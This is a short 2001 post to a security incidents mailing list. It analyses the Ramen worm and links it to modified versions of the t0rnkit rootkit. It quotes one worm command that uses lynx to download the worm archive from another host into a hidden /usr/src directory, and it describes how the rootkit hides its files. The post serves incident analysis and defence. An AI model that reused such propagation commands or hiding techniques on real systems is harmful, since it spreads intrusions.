Security Incidents mailing list archives

Re: sunrpc / wu-ftpd worm ?


From: daniel_gerald () HOTMAIL COM
Date: Tue, 16 Jan 2001 16:03:57 -0000

" lynx -source http://%s:27374 /usr/src/.poop/ramen.tgz "


Hmmmm... seems like this is another modified version of the old t0rnkit 7. The use of the /usr/src directory for hiding rootkit files is just the same as the old t0rnkit with its /usr/src/.puta directory.

Ever since t0rnkit 7 was made public by its author, there have been many modified versions of it, some with plain directory name changes and others with some replacement trojans; however, most or all of the versions retain the rootkit directory structures and the config files.

-danny.

